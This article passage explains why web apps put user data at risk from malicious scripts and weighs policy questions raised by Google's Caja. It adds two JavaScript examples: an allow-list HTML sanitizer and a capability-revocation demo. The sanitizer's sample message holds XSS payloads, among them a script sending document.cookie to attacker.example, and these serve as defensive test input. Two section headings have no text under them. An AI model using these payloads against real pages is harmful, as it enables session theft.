Web Apps Make Things Worse
Problem solved? Not quite. Remember that the original intent of the sandbox was to keep a malicious script from wreaking havoc on the local machine, which includes stealing, destroying or modifying the user's valuable data. We've just saved a piece of user data from the rising tide, but only by moving it outside that original security perimeter: it now lives on someone's server cluster, reachable by any script the browser runs in that site's pages. And what one script has stored, another can read or undo. Specifically, if the browser (or its user) can be fooled into executing a malicious script inside a page that is logged in to the service, that script can read, destroy or alter the data as if it were the user, because the browser attaches the user's session cookies to every request the page makes. Now you've got some idea why (for instance) e-mails read within a webmail interface typically have their embedded scripts disabled. All it would take is the wrong spam or phishing mail opened in the browser window, and your Gmail or Yahoo account could be toast.
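To make "embedded scripts disabled" concrete, here is an added example (not code from the page, from Gmail or from Caja) of what a webmail front end has to do to a message body before inserting it into the logged-in page: a small allow-list HTML sanitizer. Everything not explicitly allowed is dropped or escaped to plain text, so no `<script>`, event-handler attribute or `javascript:` link from the mail ever runs in the site's origin. The sample message is constructed for the demo, and the sanitizer is a toy (it does not handle attribute values containing `>` and it re-escapes existing entities); a real deployment uses a parser-based sanitizer such as DOMPurify rather than anything hand-rolled.

```javascript
'use strict';
// Added example, not code from the page or from Caja: a minimal allow-list
// HTML sanitizer of the kind a webmail front end runs over a message body
// before inserting it into the logged-in page. Anything not explicitly
// allowed is either dropped or escaped to plain text, so no script, event
// handler or javascript: URL from the message reaches the page's origin.
// Toy limitations: attribute values containing '>' are not handled and
// existing entities such as &amp; are escaped again (harmless, but ugly).

const ALLOWED_TAGS = new Set(['p', 'br', 'b', 'i', 'em', 'strong', 'ul', 'ol', 'li', 'a']);
const ALLOWED_ATTRS = new Map([['a', new Set(['href'])]]); // no on*, style, src ...
const SAFE_URL = /^(?:https?:|mailto:)/i;                  // rejects javascript:, data:, vbscript:
const DROP_WITH_CONTENT = new Set(['script', 'style', 'iframe', 'object', 'embed']);

function escapeText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// Split a tag's attribute section into [name, value] pairs.
function parseAttrs(s) {
  const out = [];
  const re = /([^\s=/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(s)) !== null) {
    out.push([m[1].toLowerCase(), m[2] ?? m[3] ?? m[4] ?? '']);
  }
  return out;
}

function sanitizeHtml(input) {
  const lower = input.toLowerCase();
  let out = '';
  let i = 0;
  while (i < input.length) {
    const lt = input.indexOf('<', i);
    if (lt === -1) { out += escapeText(input.slice(i)); break; }
    out += escapeText(input.slice(i, lt));
    const gt = input.indexOf('>', lt);
    const tag = gt === -1 ? null
      : /^<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>$/.exec(input.slice(lt, gt + 1));
    if (!tag) { out += '&lt;'; i = lt + 1; continue; }   // a stray '<' is just text
    i = gt + 1;
    const closing = tag[1] === '/';
    const name = tag[2].toLowerCase();
    if (DROP_WITH_CONTENT.has(name)) {
      if (!closing) {                      // skip everything up to the closing tag
        const end = lower.indexOf('</' + name, i);
        const close = end === -1 ? -1 : input.indexOf('>', end);
        i = close === -1 ? input.length : close + 1;
      }
      continue;
    }
    if (!ALLOWED_TAGS.has(name)) continue;  // unknown tag: drop the tag, keep its text
    if (closing) { out += '</' + name + '>'; continue; }
    let attrs = '';
    const allowed = ALLOWED_ATTRS.get(name);
    for (const [k, v] of parseAttrs(tag[3])) {
      if (!allowed || !allowed.has(k)) continue;            // drops onclick, onerror, style ...
      if (k === 'href' && !SAFE_URL.test(v.trim())) continue;
      attrs += ' ' + k + '="' + escapeText(v) + '"';
    }
    out += '<' + name + attrs + '>';
  }
  return out;
}

// Constructed sample message: the kind of payload a phishing mail might carry.
const SAMPLE_MESSAGE =
  '<p onclick="steal()">Hi <b>there</b></p>' +
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>' +
  '<a href="javascript:alert(1)">click</a>' +
  '<a href="https://example.com/x?a=1&b=2">ok</a>' +
  '<IMG SRC=x onerror=alert(1)>1 < 2';

function demo() {
  return sanitizeHtml(SAMPLE_MESSAGE);
}

console.log(demo());
```

Run under Node and the cookie-stealing script, the `onclick` handler, the `javascript:` link and the `onerror` image are all gone, while the harmless markup and the legitimate link survive. The design point is default-deny: the output can only ever contain tags and attributes named in the allow-lists, so the sanitizer does not need to know every trick for smuggling script into HTML, only what it is willing to pass through.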
So What's Caja?
What's It All Mean?
That's important in itself, but a second and perhaps more interesting problem comes from the use of Caja's capability system. Capabilities are a more powerful concept than the sandbox, and like most powerful tools they can also be dangerous. In a capability system a piece of code can do exactly what the references it holds allow and nothing more, so the policy question becomes which references each party is handed. Deciding what 'magic words' to allow in a particular setting, and who gets to say them, could become arcane and confusing, particularly if you are trying to push the edge in allowing collaborating applications.
The usual recourse in the face of such complexity is to come up with well-known and safe patterns of application. That seems the likely result here as well: the capability frameworks implemented by (for instance) OpenSocial-compliant sites aren't going to be open-ended; they will be particular to that site or class of applications. So while the Caja mechanism will present one set of issues, the definition of actual policies for its use will create another. It may constrain or expand the horizons for those who program or build business plans within the scope of the Google, MySpace, Yahoo and probably other platforms. So if you're playing in this area, make sure the technical side of the shop is watching Caja. The Caja spec is here, and there's a good starter pitch here. Then invest some time in discussing what issues or opportunities may arise if it takes off.
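To show what such a policy looks like in practice, here is an added example (not Caja's own code or API) of the object-capability pattern that Caja-style policies are built from, in plain JavaScript: the host keeps the real resource and hands a gadget an attenuated, revocable facade, so the gadget's 'magic words' are exactly the methods on that facade. The mailbox contents are constructed sample data. One assumption is doing real work here: the gadget is taken to have no way to reach the host's globals or the DOM. That isolation is what Caja's rewriting of guest code provides; this snippet only shows the policy layer that sits on top of it.

```javascript
'use strict';
// Added example, not Caja's own code: the object-capability pattern that
// Caja-style policies are built from, in plain JavaScript. The host owns the
// real resource and hands each gadget an attenuated, revocable facade; the
// gadget's "magic words" are exactly the methods on that facade. Assumption:
// the gadget cannot reach the host's globals, which is the part Caja's
// rewriting of guest code provides and this snippet does not.

// The host's real resource, holding constructed sample messages.
function makeMailbox(messages) {
  const store = messages.map(m => ({ ...m }));
  return Object.freeze({
    list: () => store.map(m => m.subject),
    read: i => ({ ...store[i] }),
    remove: i => { store.splice(i, 1); },
  });
}

// Attenuation: a strictly smaller surface. Nothing here points back at the
// full mailbox, so the holder cannot recover remove() from it.
function readOnly(mailbox) {
  return Object.freeze({ list: mailbox.list, read: mailbox.read });
}

// Revocation: the host keeps revoke(); the gadget gets forwarders that fail
// closed once it has been called.
function revocable(target) {
  let live = target;
  const facade = {};
  for (const name of Object.keys(target)) {
    facade[name] = (...args) => {
      if (live === null) throw new Error('capability revoked: ' + name);
      return live[name](...args);
    };
  }
  return { cap: Object.freeze(facade), revoke: () => { live = null; } };
}

// A third-party gadget. It is handed a capability, never the mailbox itself.
function summaryGadget(mailCap) {
  return {
    count: mailCap.list().length,
    first: mailCap.read(0).subject,
    canDelete: typeof mailCap.remove === 'function',
  };
}

// Host-side policy: this gadget gets read-only access, for as long as the host likes.
function runDemo() {
  const mailbox = makeMailbox([
    { subject: 'Invoice', body: 'see attached' },
    { subject: 'Lunch?', body: 'noon?' },
  ]);
  const { cap, revoke } = revocable(readOnly(mailbox));
  const whileGranted = summaryGadget(cap);
  revoke();
  let afterRevoke;
  try { cap.list(); afterRevoke = 'still allowed'; } catch (e) { afterRevoke = e.message; }
  return { whileGranted, afterRevoke, messagesLeft: mailbox.list().length };
}

console.log(JSON.stringify(runDemo()));
```

The gadget can list and read but has no `remove` to call, and after `revoke()` even `list` fails; the mailbox still holds both messages. Changing the policy means changing which facade the host constructs, which is exactly the site-specific decision the paragraph above says each platform will have to make.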